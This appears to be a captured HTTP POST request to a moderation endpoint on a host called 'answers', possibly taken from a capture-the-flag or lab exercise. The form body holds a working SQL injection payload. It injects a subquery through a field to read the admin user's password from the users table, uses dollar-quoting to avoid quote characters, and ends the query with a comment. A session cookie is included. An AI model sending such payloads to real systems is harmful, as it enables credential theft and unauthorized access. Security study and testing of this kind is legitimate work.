POST /moderate/3 HTTP/1.1
Host: answers
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://answers
Connection: close
Referer: http://answers/moderate
Cookie: JSESSIONID=2563EA0D13795D961E43F023B9AB7DAF
Upgrade-Insecure-Requests: 1

active=true&mod=true,description=(select+password+from+users+where+username=$$admin$$)--+-
